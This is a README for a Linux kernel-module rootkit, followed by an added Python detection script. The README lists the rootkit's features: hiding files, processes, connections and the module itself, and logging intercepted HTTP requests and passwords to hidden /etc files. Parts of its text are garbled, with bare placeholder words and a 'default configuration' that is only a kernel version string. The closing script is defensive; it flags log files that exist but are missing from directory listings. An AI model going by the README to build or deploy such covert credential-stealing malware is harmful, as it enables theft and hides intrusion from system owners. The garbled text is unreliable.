Yet another LKM rootkit for Linux. It hooks the syscall table.

Features:
- Hide files whose names end with the configured suffix (FILE_SUFFIX, ".rootkit" by default).
COMMAND_CONTAINS
Examples:
.//./malicious_process
wget http://old-releases.ubuntu.com/releases/zesty/ubuntu-17.04-desktop-amd64.iso .//./
- Intercept HTTP requests. All intercepted GET and POST HTTP requests are logged to /etc/http_requests[FILE_SUFFIX]. When a password is found in an HTTP request, it is additionally logged to /etc/passwords[FILE_SUFFIX].
- The rootkit module is invisible in lsmod output, the file /proc/modules, and the directory /sys/module/.
rmmod
UNABLE_TO_UNLOAD
- Netstat and similar tools won't see TCP connections of hidden processes.

Configuration:
The configuration is placed at the beginning of the file rootkit.c. Below is the default configuration:
Linux x 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux
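
A detection-side check for the file hiding and log paths listed above, added here as an example and not part of the project's code: it reports names that resolve by direct path lookup yet are missing from the directory listing. It assumes the hiding filters directory listings only (the README does not say whether direct lookups are also hooked) and that the default suffix is unchanged; `hidden_entries`, `check_etc` and `demo` are hypothetical names.

```python
import os
import tempfile

# Values taken from the README above; the suffix is its stated default.
FILE_SUFFIX = ".rootkit"
LOG_BASENAMES = ("http_requests", "passwords")  # logged under /etc per the README


def hidden_entries(directory, names, list_dir=os.listdir, exists=os.path.lexists):
    """Return names that resolve by direct path lookup but are missing
    from the directory listing (a cross-view discrepancy)."""
    listed = set(list_dir(directory))
    return sorted(
        n for n in names
        if n not in listed and exists(os.path.join(directory, n))
    )


def check_etc(etc="/etc", suffix=FILE_SUFFIX):
    """Probe for the two log files the README names."""
    return hidden_entries(etc, [b + suffix for b in LOG_BASENAMES])


def demo():
    """Constructed sample: a temp dir plus a listing function that drops
    suffixed names, standing in for a filtered directory view."""
    probes = [b + FILE_SUFFIX for b in LOG_BASENAMES]

    def filtered(path):
        return [n for n in os.listdir(path) if not n.endswith(FILE_SUFFIX)]

    with tempfile.TemporaryDirectory() as d:
        for name in ("hosts", "http_requests" + FILE_SUFFIX):
            open(os.path.join(d, name), "w").close()
        clean = hidden_entries(d, probes)                      # honest listing
        hooked = hidden_entries(d, probes, list_dir=filtered)  # filtered listing
        return clean, hooked


if __name__ == "__main__":
    print("demo (clean view, filtered view):", demo())
    print("live /etc check:", check_etc())
```

An empty result from `check_etc()` is not proof of a clean host: a changed suffix or hooked direct lookups would defeat this probe, so treat it as one signal alongside offline disk inspection.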